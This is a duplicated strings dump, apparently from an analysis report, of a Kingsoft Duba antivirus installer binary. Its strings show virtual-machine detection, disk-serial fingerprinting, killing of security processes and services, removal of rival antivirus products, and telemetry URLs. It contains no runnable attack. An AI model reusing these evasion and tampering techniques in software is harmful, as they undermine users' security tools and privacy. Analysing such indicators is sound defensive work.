Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Access Violation
TFTP: Access Violation
TFTP: File Not Found
TFTP: File Not Found
Login denied
Login denied
Issuer check against peer certificate failed
Issuer check against peer certificate failed
Invalid LDAP URL
Invalid LDAP URL
Unrecognized HTTP Content-Encoding
Unrecognized HTTP Content-Encoding
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with known CA certificates
Peer certificate cannot be authenticated with known CA certificates
Problem with the local SSL certificate
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
A libcurl function was given a bad argument
A libcurl function was given a bad argument
Operation was aborted by an application callback
Operation was aborted by an application callback
FTP: command REST failed
FTP: command REST failed
FTP: command PORT failed
FTP: command PORT failed
HTTP response code said error
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
FTP: weird server reply
FTP: weird server reply
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
Unsupported protocol
Unsupported protocol
Winsock version not supported
Winsock version not supported
Protocol family not supported
Protocol family not supported
Address family not supported
Address family not supported
Operation not supported
Operation not supported
Socket is unsupported
Socket is unsupported
Protocol is unsupported
Protocol is unsupported
Protocol option is unsupported
Protocol option is unsupported
Unknown error %d (%#x)
Unknown error %d (%#x)
d:d
d:d
d:d:d
d:d:d
0123456789
0123456789
%c%c==
%c%c==
%c%c%c=
%c%c%c=
%c%c%c%c
%c%c%c%c
.jpeg
.jpeg
.html
.html
--%s--
--%s--
couldn't open file "%s"
couldn't open file "%s"
Content-Type: %s
Content-Type: %s
; filename="%s"
; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Type: multipart/mixed, boundary=%s
Content-Type: multipart/mixed, boundary=%s
%s; boundary=%s
%s; boundary=%s
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
g_Install.Init ...
g_Install.Init ...
g_Install.Init return:%d
g_Install.Init return:%d
DbgExtraceAllFiles return:%d
DbgExtraceAllFiles return:%d
import file install need reboot
import file install need reboot
g_Install.StartLoadPacketData
g_Install.StartLoadPacketData
not support cover install in silent mode
not support cover install in silent mode
the old kav version not support cover install
the old kav version not support cover install
ProcessOldProduct RunApp return:%d, file:%ws, cmd:%ws
ProcessOldProduct RunApp return:%d, file:%ws, cmd:%ws
RunAutofix RunApp return:%d
RunAutofix RunApp return:%d
KApp::GetSilentFlag return %d silent:%d
KApp::GetSilentFlag return %d silent:%d
KApp::VersionVerification return %d silent:%d
KApp::VersionVerification return %d silent:%d
0,0,-0,%d
0,0,-0,%d
0,-%d,-0,-0
0,-%d,-0,-0
extern_alpha_key
extern_alpha_key
crtext
crtext
headacceptlbtndownmsg
headacceptlbtndownmsg
0,0,-0,-0
0,0,-0,-0
Kxehost OpenEvent return:%d, error:%d
Kxehost OpenEvent return:%d, error:%d
kill kxetray, failcount:%d, killcount:%d
kill kxetray, failcount:%d, killcount:%d
kill kxetray 2, failcount:%d, killcount:%d
kill kxetray 2, failcount:%d, killcount:%d
StopKxetray return:%d
StopKxetray return:%d
StopService return:%d
StopService return:%d
KFunction::KillProcessByPath failcount:%d, killcount:%d
KFunction::KillProcessByPath failcount:%d, killcount:%d
Wait all progress exit, count:%d
Wait all progress exit, count:%d
Kill services retrun:%d
Kill services retrun:%d
StopService WaitServiceExit return:%d
StopService WaitServiceExit return:%d
StopService WaitServiceExit1 return:%d
StopService WaitServiceExit1 return:%d
ClearBCDriver delete reg return:%d
ClearBCDriver delete reg return:%d
DeleteFile return:%d, error:%d, path:%ws
DeleteFile return:%d, error:%d, path:%ws
KInsall::Is360AvInstalled download fail, file:%ws, nStatus:%d
KInsall::Is360AvInstalled download fail, file:%ws, nStatus:%d
6AES part of OpenSSL 0.9.8c 05 Sep 2006
6AES part of OpenSSL 0.9.8c 05 Sep 2006
User-Agent: Mozilla/4.0
User-Agent: Mozilla/4.0
Authorization: NTLM %s
Authorization: NTLM %s
Proxy-Authorization: NTLM %s
Proxy-Authorization: NTLM %s
%s:xx
%s:xx
# Block type: 2:%x 3:%x
# Block type: 2:%x 3:%x
# DPMS capabilities: Active off:%s Suspend:%s Standby:%s
# DPMS capabilities: Active off:%s Suspend:%s Standby:%s
%d,%d
%d,%d
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
%d ReadPhysicalDriveInNTWithAdminRights ERROR
%d ReadPhysicalDriveInNTWithAdminRights ERROR
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
\\.\IDE21201.VXD
\\.\IDE21201.VXD
\\.\Scsi%d:
\\.\Scsi%d:
Drive%dModelNumber
Drive%dModelNumber
Drive%dSerialNumber
Drive%dSerialNumber
DriveÜontrollerRevisionNumber
DriveÜontrollerRevisionNumber
DriveÜontrollerBufferSize
DriveÜontrollerBufferSize
Drive%dType
Drive%dType
VBoxHook.dll
VBoxHook.dll
\\.\VBoxMiniRdrDN
\\.\VBoxMiniRdrDN
SELECT * FROM Win32_OperatingSystem WHERE (InstallDate IS NOT NULL)
SELECT * FROM Win32_OperatingSystem WHERE (InstallDate IS NOT NULL)
lXXxXXXXXXXX
lXXxXXXXXXXX
XX
XX
xxxxxxxx
xxxxxxxx
KFunction::RunApp CreateProcessW error:%d, wait:%d, show:%d, path:%ws, cmd:%ws
KFunction::RunApp CreateProcessW error:%d, wait:%d, show:%d, path:%ws, cmd:%ws
IsProcessRunningByDirectory CreateFile return:%d, error:%d, path:%ws
IsProcessRunningByDirectory CreateFile return:%d, error:%d, path:%ws
KillProcessByPath CreateToolhelp32Snapshot, error:%d
KillProcessByPath CreateToolhelp32Snapshot, error:%d
%ws:%d
%ws:%d
KillProcessByPath OpenProcess fail, process:%ws, error:%d
KillProcessByPath OpenProcess fail, process:%ws, error:%d
Terminate Process return:%d, error:%d, pid:%d, path:%ws
Terminate Process return:%d, error:%d, pid:%d, path:%ws
StopProcessByPid pid:%d return fase
StopProcessByPid pid:%d return fase
KillProcessByPid TerminateProcess return:%d, error:%d, pid:%d
KillProcessByPid TerminateProcess return:%d, error:%d, pid:%d
KillProcessByCmd taskkill.exe %ws pid:%d return:%d, exitcode:%d, GetLastError:%d
KillProcessByCmd taskkill.exe %ws pid:%d return:%d, exitcode:%d, GetLastError:%d
KillProcessByPathkxescore CreateToolhelp32Snapshot, error:%d
KillProcessByPathkxescore CreateToolhelp32Snapshot, error:%d
KillProcessByPathkxescore OpenProcess fail, process:%ws, error:%d, pid:%d
KillProcessByPathkxescore OpenProcess fail, process:%ws, error:%d, pid:%d
AddPid1 return:%d
AddPid1 return:%d
AddPid1:%d
AddPid1:%d
AddPid2 return:%d
AddPid2 return:%d
AddPid2:%d
AddPid2:%d
StopOldSelfProtect:%d
StopOldSelfProtect:%d
SFP return:%d
SFP return:%d
StopSelfProtect:%d
StopSelfProtect:%d
OLDSFP return:%d
OLDSFP return:%d
KInsall::LenoveOem return:%d
KInsall::LenoveOem return:%d
DeleteUUIDex RecurseDeleteKey :%d
DeleteUUIDex RecurseDeleteKey :%d
DeleteFile hg.dat return:%d
DeleteFile hg.dat return:%d
SetServicesInfo return:%d
SetServicesInfo return:%d
CreateShellLink return:%d, file:%ws, cmd:%ws, link:%ws
CreateShellLink return:%d, file:%ws, cmd:%ws, link:%ws
TerminateProc pid: %d reutrn:%d :dwExitCode: %d
TerminateProc pid: %d reutrn:%d :dwExitCode: %d
KInstallDetect::IsInstallDuba() return:%d
KInstallDetect::IsInstallDuba() return:%d
error_msg
error_msg
bUrlMon
bUrlMon
CmdLine
CmdLine
KGetSilentFlag::GetSilentFlag return %d silentflag:%d
KGetSilentFlag::GetSilentFlag return %d silentflag:%d
KImportFileInstaller::ReleaseFile---begin...
KImportFileInstaller::ReleaseFile---begin...
KImportFileInstaller::ReleaseFile---GetPrivateProfileString failed,strKey = %s
KImportFileInstaller::ReleaseFile---GetPrivateProfileString failed,strKey = %s
KImportFileInstaller::ReleaseFile---Rename failed, %s
KImportFileInstaller::ReleaseFile---Rename failed, %s
KImportFileInstaller::ReleaseFile---end...
KImportFileInstaller::ReleaseFile---end...
KImportFileInstaller::_DisableIntercept---Result = %d
KImportFileInstaller::_DisableIntercept---Result = %d
load product.xml fail
load product.xml fail
found installed product, version:%ws, cover:%d, path:%ws
found installed product, version:%ws, cover:%d, path:%ws
version:%ws, cover:%d
version:%ws, cover:%d
KInsall::IsInstalledKav return:%d
KInsall::IsInstalledKav return:%d
RunApp Register return:%d
RunApp Register return:%d
KInsall::Register return:%d
KInsall::Register return:%d
GetDebugPrivilege return:%d GetLassError return:%d
GetDebugPrivilege return:%d GetLassError return:%d
cover:%d, kxescore:%d
cover:%d, kxescore:%d
StopAllProgress return:%d
StopAllProgress return:%d
ClearWebShield...
ClearWebShield...
ClearWebShield return:%d
ClearWebShield return:%d
install end, return:%d, install cost time:%dms
install end, return:%d, install cost time:%dms
install thread end:%d
install thread end:%d
KInsall::ParseConfig return:%d
KInsall::ParseConfig return:%d
AutoRunkav:%d _ Deleteuuid:%d_lockstartpage:%d
AutoRunkav:%d _ Deleteuuid:%d_lockstartpage:%d
KInsall::ParseKSafe path:%ws, cmd:%ws, wait:%d, show:%d
KInsall::ParseKSafe path:%ws, cmd:%ws, wait:%d, show:%d
KInsall::ParsePCMgr path:%ws, cmd:%ws, wait:%d, show:%d
KInsall::ParsePCMgr path:%ws, cmd:%ws, wait:%d, show:%d
ParsePCMgr return:%d
ParsePCMgr return:%d
KInsall::ParseLaunch path:%ws, cmd:%ws, wait:%d, show:%d
KInsall::ParseLaunch path:%ws, cmd:%ws, wait:%d, show:%d
ParseLaunch return:%d
ParseLaunch return:%d
KInsall::ParseRecommend url:%ws
KInsall::ParseRecommend url:%ws
KSetupWiz::RunClear return:%d
KSetupWiz::RunClear return:%d
KSetupWiz::RunInstall return:%d
KSetupWiz::RunInstall return:%d
install ksafe return:%d
install ksafe return:%d
install pcmgr return:%d
install pcmgr return:%d
IsInstallSuitPacket return:%d
IsInstallSuitPacket return:%d
ClearInvalidDrivers return:%d, error:%d, path:%ws
ClearInvalidDrivers return:%d, error:%d, path:%ws
silent mode detect3 loadUrl return:%d
silent mode detect3 loadUrl return:%d
KInsall::Is360AvInstalled return:%d
KInsall::Is360AvInstalled return:%d
FileName:%ws,param:%ws,waittime:%d bshow:%d
FileName:%ws,param:%ws,waittime:%d bshow:%d
KInsall::FixRegError TestIsVolatieKey(kingsoft) return %d, error:%d
KInsall::FixRegError TestIsVolatieKey(kingsoft) return %d, error:%d
KInsall::FixRegError BackKey(kingsoft) return %d, error:%d
KInsall::FixRegError BackKey(kingsoft) return %d, error:%d
KInsall::FixRegError ImportKey(kingsoft) return %d, error:%d
KInsall::FixRegError ImportKey(kingsoft) return %d, error:%d
KInsall::ParseTidWhiteList tid1:%d, tid2:%d
KInsall::ParseTidWhiteList tid1:%d, tid2:%d
KInsall::ParseTidWhiteList return:%d
KInsall::ParseTidWhiteList return:%d
KInsall::IsInTidWhiteList return:%d
KInsall::IsInTidWhiteList return:%d
LoadProductPacket CreateThread return:%d
LoadProductPacket CreateThread return:%d
ExtractMemoryFiles return:%d
ExtractMemoryFiles return:%d
ExtractPacket return:%d
ExtractPacket return:%d
GetPacketData %d
GetPacketData %d
GetPacketData return:%d
GetPacketData return:%d
Extract return:%d
Extract return:%d
LoadImageToMem CreateFile error:%d, path:%ws
LoadImageToMem CreateFile error:%d, path:%ws
CreateFileByMem CreateFileMapping error:%d, path:%ws
CreateFileByMem CreateFileMapping error:%d, path:%ws
CreateFileByMem MapViewOfFile error:%d, path:%ws
CreateFileByMem MapViewOfFile error:%d, path:%ws
{9B8A9862-3FE6-452e-A096-31E845BF839B}
{9B8A9862-3FE6-452e-A096-31E845BF839B}
Uncompress return:%d
Uncompress return:%d
KSearch::Search product count:%d
KSearch::Search product count:%d
KSearch::Search return:%d
KSearch::Search return:%d
KSearch::ParseConfig return:%d
KSearch::ParseConfig return:%d
KSearch::ReadRegPath wrong root key
KSearch::ReadRegPath wrong root key
KSearch::ReadRegPath Open key fail
KSearch::ReadRegPath Open key fail
KSearch::ReadRegPath Read key fail
KSearch::ReadRegPath Read key fail
ReadRegPath return:%d, root:%ws, path:%ws, name:%ws
ReadRegPath return:%d, root:%ws, path:%ws, name:%ws
IsFileListExist return not exist, error:%d, path:%ws
IsFileListExist return not exist, error:%d, path:%ws
g_App.Run...
g_App.Run...
g_App.Run return:%d
g_App.Run return:%d
GetExportInterface
GetExportInterface
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
KFixAV DeleteSubKeyTree %ws return:%d
KFixAV DeleteSubKeyTree %ws return:%d
FilterBlack() DeleteSubKeyTree %ws %ws
FilterBlack() DeleteSubKeyTree %ws %ws
FixPolicies return:%d
FixPolicies return:%d
%d-%d-%d d:d:d d
%d-%d-%d d:d:d d
particle%d
particle%d
notifymsg
notifymsg
SendHttpRequestEx
SendHttpRequestEx
bubble%d
bubble%d
OnInstallProgress nProgress:%d, m_nProgressCount:%d
OnInstallProgress nProgress:%d, m_nProgressCount:%d
137,269,199,285
137,269,199,285
62,269,124,285
62,269,124,285
22,9,262,24
22,9,262,24
KUninstall360Dlg::CallInfoc reported:%s %s
KUninstall360Dlg::CallInfoc reported:%s %s
KUninstall360GuideDlg::ReportInfo reported:%s %s
KUninstall360GuideDlg::ReportInfo reported:%s %s
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
MoveFileEx Rename file fail, error:%d
MoveFileEx Rename file fail, error:%d
CreateFile:%d
CreateFile:%d
CreateFileByMem CreateFile error:%d, path:%ws
CreateFileByMem CreateFile error:%d, path:%ws
CreateFileMapping:%d
CreateFileMapping:%d
MapViewOfFile:%d
MapViewOfFile:%d
ChecksumFileByMem return%d, path:%ws
ChecksumFileByMem return%d, path:%ws
ChecksumFileByMem CreateFile error:%d, path:%ws
ChecksumFileByMem CreateFile error:%d, path:%ws
ChecksumFileByMem CreateFileMapping error:%d, path:%ws
ChecksumFileByMem CreateFileMapping error:%d, path:%ws
ChecksumFileByMem MapViewOfFile error:%d, path:%ws
ChecksumFileByMem MapViewOfFile error:%d, path:%ws
ReportV2 ...
ReportV2 ...
ReportV2 end
ReportV2 end
ReportOtherInfo ...
ReportOtherInfo ...
ReportOtherInfo end
ReportOtherInfo end
ReportLiebaoRcmd ...
ReportLiebaoRcmd ...
ReportLiebaoRcmd end
ReportLiebaoRcmd end
ReportImportFileInstall ...
ReportImportFileInstall ...
ReportImportFileInstall end
ReportImportFileInstall end
ReportV2BJ ...
ReportV2BJ ...
ReportV2BJ end
ReportV2BJ end
ReportParentProcessInfo ...
ReportParentProcessInfo ...
ReportParentProcessInfo end
ReportParentProcessInfo end
DeleteSubKeyTree root:%d, path:%ws
DeleteSubKeyTree root:%d, path:%ws
DeleteSubKeyTree return:%d
DeleteSubKeyTree return:%d
KExecReg Run Return:%d, delete:%d, root:0x%x, path:%ws, type:%d, name:%ws, value:%ws
KExecReg Run Return:%d, delete:%d, root:0x%x, path:%ws, type:%d, name:%ws, value:%ws
KExecProcess Run, path:%ws, cmd:%ws, time:%d, show:%d
KExecProcess Run, path:%ws, cmd:%ws, time:%d, show:%d
KExecProcessRun return:%d
KExecProcessRun return:%d
KExecService Run operation:%d
KExecService Run operation:%d
KxEInstallService return:%d, path:%ws
KxEInstallService return:%d, path:%ws
KxEUninstallService return:%d, name:%ws
KxEUninstallService return:%d, name:%ws
KxEStartService return:%d, name:%ws
KxEStartService return:%d, name:%ws
KxEStopService return:%d, name:%ws
KxEStopService return:%d, name:%ws
KExecService Run return:%d
KExecService Run return:%d
KExecFile DeleteFile return:%d, error:%d, path:%ws
KExecFile DeleteFile return:%d, error:%d, path:%ws
KExecLink DeleteFolder return:%d, path:%ws
KExecLink DeleteFolder return:%d, path:%ws
KExecLink DeleteFile return:%d, error:%d, path:%ws
KExecLink DeleteFile return:%d, error:%d, path:%ws
KExecLink CreateLink return:%d, file:%ws, cmd:%ws, link:%ws
KExecLink CreateLink return:%d, file:%ws, cmd:%ws, link:%ws
CreateExecReg fail
CreateExecReg fail
CreateExecService fail
CreateExecService fail
CreateExecProcess fail
CreateExecProcess fail
CreateExecLink fail
CreateExecLink fail
KInstaller::ParseInstall return:%d
KInstaller::ParseInstall return:%d
KInstaller::ParseCoverInstall return:%d
KInstaller::ParseCoverInstall return:%d
KInstaller::Install return:%d
KInstaller::Install return:%d
KInstaller::Start return:%d
KInstaller::Start return:%d
KInstaller::CoverInstall return:%d
KInstaller::CoverInstall return:%d
ModifyFolderIcon _tfopen fail, error:%d
ModifyFolderIcon _tfopen fail, error:%d
CreateExecFile fail
CreateExecFile fail
KClear::Clean return:%d
KClear::Clean return:%d
WinHttpOpen
WinHttpOpen
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpReadData
WinHttpReadData
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpSetOption
WinHttpSetOption
WinHttpSetTimeouts
WinHttpSetTimeouts
FindAV2012:%d
FindAV2012:%d
C:\drv.pdb
C:\drv.pdb
%s\Connection
%s\Connection
e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kpacket.pdb
e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kpacket.pdb
GdiplusShutdown
GdiplusShutdown
zcÃ
zcÃ
.?AV?$CWindowImpl@VKNewMsgbox@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@3@@ATL@@
.?AV?$CWindowImpl@VKNewMsgbox@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@3@@ATL@@
.?AV?$CBkDialogImpl@VKNewMsgbox@@VCBkDialogView@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@4@@@
.?AV?$CBkDialogImpl@VKNewMsgbox@@VCBkDialogView@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@4@@@
.?AVKNewMsgbox@@
.?AVKNewMsgbox@@
.?AV?$KxEIPCClientT@VIKxEServiceMgr@@VKxEPipeClientCommunication@@@@
.?AV?$KxEIPCClientT@VIKxEServiceMgr@@VKxEPipeClientCommunication@@@@
.?AV?$KxEPipeClientT@VIKxEServiceMgr@@@@
.?AV?$KxEPipeClientT@VIKxEServiceMgr@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineSP_old@@VKxEPipeClientCommunication@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineSP_old@@VKxEPipeClientCommunication@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineSP_old@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineSP_old@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineTrustSP@@VKxEPipeClientCommunication@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineTrustSP@@VKxEPipeClientCommunication@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineTrustSP@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineTrustSP@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineSP@@VKxEPipeClientCommunication@@@@
.?AV?$KxEIPCClientT@VIKxEDefendEngineSP@@VKxEPipeClientCommunication@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineSP@@@@
.?AV?$KxEPipeClientT@VIKxEDefendEngineSP@@@@
.?AV?$CAtlHttpClientT@VZEvtSyncSocket@ATL@@@ATL@@
.?AV?$CAtlHttpClientT@VZEvtSyncSocket@ATL@@@ATL@@
.?AVKInstallStageReport@KDubaPacket@@
.?AVKInstallStageReport@KDubaPacket@@
.?AVCKANRegisterKey@@
.?AVCKANRegisterKey@@
.?AVKWriteHttpFile@@
.?AVKWriteHttpFile@@
.?AV?$CWindowImpl@VCBkMsgWnd@@VCWindow@ATL@@V?$CWinTraits@$0GMPAAAA@$0EABAA@@3@@ATL@@
.?AV?$CWindowImpl@VCBkMsgWnd@@VCWindow@ATL@@V?$CWinTraits@$0GMPAAAA@$0EABAA@@3@@ATL@@
.?AVCBkMsgWnd@@
.?AVCBkMsgWnd@@
.?AVIProcessMsgBack@@
.?AVIProcessMsgBack@@
.?AVCBkWindowScollBar@@
.?AVCBkWindowScollBar@@
.?AUICryptoSetPassword@@
.?AUICryptoSetPassword@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AUICryptoGetTextPassword@@
.?AUICryptoGetTextPassword@@
.?AVKImportFileInstallBlock@KDubaPacket@@
.?AVKImportFileInstallBlock@KDubaPacket@@
.?AVKExecLink@@
.?AVKExecLink@@
.?AVKExecFile@@
.?AVKExecFile@@
.?AVKExecService@@
.?AVKExecService@@
.?AVKExecProcess@@
.?AVKExecProcess@@
.?AVKExecReg@@
.?AVKExecReg@@
.?AVIExec@@
.?AVIExec@@
.?AVKWriteMemHttpFile@@
.?AVKWriteMemHttpFile@@
.?AVKUnionInfocReporter@anti_cheat@@
.?AVKUnionInfocReporter@anti_cheat@@
|:S.ww
|:S.ww
0eW`%f
0eW`%f
%Xr01
%Xr01
4.vsX\
4.vsX\
r.dwpt
r.dwpt
%x@!X
%x@!X
#iTXtXML:com.adobe.xmp
#iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> 4o
" id="W5M0MpCehiHzreSzNTczkc9d"?> 4o
" id="W5M0MpCehiHzreSzNTczkc9d"?> 9S/
" id="W5M0MpCehiHzreSzNTczkc9d"?> 9S/
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
ddd
ddd
ressrc\chs\uplive.svr
ressrc\chs\uplive.svr
hXXp://ct.duba.net/s/ut/
hXXp://ct.duba.net/s/ut/
avp.exe
avp.exe
ffcert.exe
ffcert.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{560985FB-4B76-4121-9189-7A2CDC7886D6}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{560985FB-4B76-4121-9189-7A2CDC7886D6}
avscan.exe
avscan.exe
avcenter.exe
avcenter.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Avira AntiVir Desktop
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Avira AntiVir Desktop
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
kautofix.exe
kautofix.exe
L%d-%d-%d:%d-%d
L%d-%d-%d:%d-%d
%s %s
%s %s
comctl32.dll
comctl32.dll
%s\%d.bmp
%s\%d.bmp
%s\%d.%s
%s\%d.%s
msyh.ttf
msyh.ttf
simsun.ttc
simsun.ttc
SimSun.ttc
SimSun.ttc
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
msimg32.dll
msimg32.dll
gdata\skin\skincfg.ini
gdata\skin\skincfg.ini
tuxtheme.dll
tuxtheme.dll
%d%%%s
%d%%%s
Akscan.exe
Akscan.exe
kxesapp.exe
kxesapp.exe
kxedefend.exe
kxedefend.exe
kxescore.exe
kxescore.exe
Global\F626D0A6-A5A1-4719-A80E-A07907F414C1-%s
Global\F626D0A6-A5A1-4719-A80E-A07907F414C1-%s
kxetray.exe
kxetray.exe
btbg.gif
btbg.gif
*.kid
*.kid
scom.xml
scom.xml
bc.sys
bc.sys
clear_i.xml
clear_i.xml
%s\%s
%s\%s
\6EED6E3F-BDA6-490e-8F67-6ECDD0697AB2
\6EED6E3F-BDA6-490e-8F67-6ECDD0697AB2
c:\Program Files
c:\Program Files
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{052CFB79-9D62-42E3-8A15-DE66C2C97C3E}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{052CFB79-9D62-42E3-8A15-DE66C2C97C3E}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\thunder_is1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\thunder_is1
Global\48411015-6EB4-4469-8D21-A8A9C8B7FB0D
Global\48411015-6EB4-4469-8D21-A8A9C8B7FB0D
kpacket_info.dat
kpacket_info.dat
service%d
service%d
file%d
file%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD
uninst.exe
uninst.exe
cmd.exe /c "
cmd.exe /c "
cmd.exe
cmd.exe
https
https
kxecomm.dat
kxecomm.dat
_sp.xcf
_sp.xcf
kxebase.dll
kxebase.dll
x-x-x-xx-xxxxxx
x-x-x-xx-xxxxxx
CLSID\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}
CLSID\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}
Software\Classes\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}
Software\Classes\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}
%d%s%s%s%d%s
%d%s%s%s%d%s
%s?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s&mid=%d&dsn=%s&old_svrid=%s
%s?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s&mid=%d&dsn=%s&old_svrid=%s
_duba.dat
_duba.dat
NextReportTime
NextReportTime
LastReportTime
LastReportTime
*.ich
*.ich
index_=%d&count_=%d
index_=%d&count_=%d
kich%d\
kich%d\
union_server0=hXXp://union.infoc.duba.net/nep/v1/
union_server0=hXXp://union.infoc.duba.net/nep/v1/
